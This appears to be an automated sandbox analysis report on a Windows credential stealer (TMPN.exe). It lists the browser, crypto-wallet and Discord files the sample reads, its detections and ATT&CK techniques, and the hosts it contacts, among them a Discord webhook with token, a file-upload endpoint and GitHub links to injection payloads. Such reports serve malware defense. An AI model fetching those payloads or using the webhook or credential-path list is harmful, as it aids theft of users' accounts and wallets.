Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eigblbgjknlfbajkfhopmcojidlgcehm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior

Tries to steal communication platform credentials (via file / registry access)

Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Local\discord	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Local\discordcanary	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Local\discordptb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Local\discorddevelopment	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Local\discord	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Local\discordcanary	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Local\discordptb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Local\discorddevelopment	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\discord	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\discordcanary	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\discordptb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\discorddevelopment	Jump to behavior

Source: Yara match	File source: TMPN.exe, type: SAMPLE
Source: Yara match	File source: 0.0.TMPN.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TMPN.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.0.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000000.2330525795.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2120936249.0000000000705000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2341077622.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2247151729.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TMPN.exe PID: 2244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecurityHealthSystray.exe PID: 4920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecurityHealthSystray.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED

Remote Access Functionality

Yara detected Skuld Stealer

Source: Yara match	File source: TMPN.exe, type: SAMPLE
Source: Yara match	File source: 0.0.TMPN.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TMPN.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.0.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.2248250951.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2330525795.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2358971472.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2120936249.0000000000705000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2341077622.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2263686910.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2331278485.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4583102943.0000000001076000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2121587219.0000000001076000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2247151729.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TMPN.exe PID: 2244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecurityHealthSystray.exe PID: 4920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecurityHealthSystray.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	24 System Information Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	212 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	3 Disable or Modify Tools	LSASS Memory	1 Query Registry	Remote Desktop Protocol	3 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	1 Registry Run Keys / Startup Folder	12 Process Injection	1 Deobfuscate/Decode Files or Information	Security Account Manager	231 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Install Root Certificate	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	151 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TMPN.exe	68%	ReversingLabs	Win64.Trojan.YanismaStealer
TMPN.exe	71%	Virustotal		Browse
TMPN.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	68%	ReversingLabs	Win64.Trojan.YanismaStealer
C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	71%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
ptb.discord.com	1%	Virustotal	Browse
api.ipify.org	0%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://ip-api.com/json	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://account.bellmedia.c	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
http://crl.micft.cMicRosof	0%	URL Reputation	safe
https://www.reddit.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://api.ipify.org/	0%	URL Reputation	safe
https://www.ebay.co.uk/	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://www.ebay.de/	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://crl.mic	0%	URL Reputation	safe
https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON	0%	Avira URL Cloud	safe
http://ns.a.0/sTy	0%	Avira URL Cloud	safe
http://ns.adobe.hotosh	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://www.wykop.pl/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://www.olx.pl/	0%	URL Reputation	safe
https://support.mozilla.org/products/firefox	0%	URL Reputation	safe
https://bugzilla.mo	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
http://crl.v	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe
http://ip-api.com/line/?fields=hosting	0%	URL Reputation	safe
https://ptb.discord.com/api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9YtQWuA8etVIU6_PpLcbsJWD9d	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Virustotal		Browse
https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpg	0%	Avira URL Cloud	safe
https://ptb.discord.com/api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Avira URL Cloud	safe
https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON	0%	Virustotal		Browse
https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://ptb.discord.com/api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9YtQWuA8etVIU6_PpLcbsJWD9d	1%	Virustotal		Browse
https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
https://www.amazon.com/	0%	Avira URL Cloud	safe
https://ptb.discord.com/api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9	1%	Virustotal		Browse
http://www.microsoft.co~	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://avatars.githubusercontent.com/u/145487845?v=4	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet	0%	Virustotal		Browse
https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js1157920892103562487626	0%	Avira URL Cloud	safe
https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:	0%	Virustotal		Browse
https://avatars.githubusercontent.com/u/145487845?v=4sqlite:	0%	Avira URL Cloud	safe
https://www.amazon.com/	0%	Virustotal		Browse
https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%s	0%	Avira URL Cloud	safe
https://www.google.com/	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js1157920892103562487626	1%	Virustotal		Browse
https://www.amazon.de/	0%	Avira URL Cloud	safe
https://www.baidu.com/	0%	Avira URL Cloud	safe
https://www.google.com/	0%	Virustotal		Browse
https://avatars.githubusercontent.com/u/145487845?v=4sqlite:	0%	Virustotal		Browse
https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%s	0%	Virustotal		Browse
https://www.amazon.de/	0%	Virustotal		Browse
https://www.baidu.com/	1%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpg	0%	Virustotal		Browse
https://avatars.githubusercontent.com/u/145487845?v=4	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ptb.discord.com	162.159.128.233	true	false	1%, Virustotal, Browse	unknown
api.ipify.org	172.67.74.152	true	true	0%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/json	false	URL Reputation: safe	unknown
https://ptb.discord.com/api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9YtQWuA8etVIU6_PpLcbsJWD9d	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ipify.org/	true	URL Reputation: safe	unknown
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ns.adobe.hotosh	powershell.exe, 00000010.00000002.2378348806.000002147D16D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.a.0/sTy	powershell.exe, 00000010.00000002.2378348806.000002147D16D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000010.00000002.2364137931.0000021475161000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.bellmedia.c	TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON	TMPN.exe, SecurityHealthSystray.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000010.00000002.2364137931.0000021475161000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000D.00000002.2315610892.00000276B6D6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2364137931.000002147501F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2281611258.0000021466915000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2364137931.0000021475161000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/v9/users/	SecurityHealthSystray.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://oneget.orgX	powershell.exe, 00000010.00000002.2281611258.0000021466715000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.micft.cMicRosof	powershell.exe, 0000000D.00000002.2342891865.00000276BF300000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reddit.com/	TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000D.00000002.2263957756.00000276A6D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2281611258.0000021464FB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpg	TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp, TMPN.exe, 00000000.00000002.4583301658.000000C000166000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ebay.co.uk/	TMPN.exe, 00000000.00000002.4583301658.000000C00012A000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ptb.discord.com/api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9	TMPN.exe, SecurityHealthSystray.exe.0.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000000D.00000002.2315610892.00000276B6D6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2364137931.000002147501F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2281611258.0000021466915000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2364137931.0000021475161000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000010.00000002.2281611258.0000021466715000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet	TMPN.exe, SecurityHealthSystray.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000010.00000002.2281611258.00000214668BA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000D.00000002.2263957756.00000276A6F28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ebay.de/	TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000010.00000002.2281611258.00000214668BA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000010.00000002.2281611258.0000021465BE4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:	TMPN.exe, SecurityHealthSystray.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.amazon.com/	TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp, TMPN.exe, 00000000.00000002.4583301658.000000C00012A000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.mic	powershell.exe, 0000000D.00000002.2342891865.00000276BF300000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000010.00000002.2364137931.0000021475161000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.wykop.pl/	TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.co~	powershell.exe, 0000000D.00000002.2351115199.00000276BF3BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avatars.githubusercontent.com/u/145487845?v=4	TMPN.exe, 00000000.00000002.4583301658.000000C000166000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	TMPN.exe, 00000000.00000002.4597960184.0000028D6F587000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.olx.pl/	TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000010.00000002.2281611258.00000214668BA000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefox	TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bugzilla.mo	TMPN.exe, 00000000.00000002.4583301658.000000C00012A000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
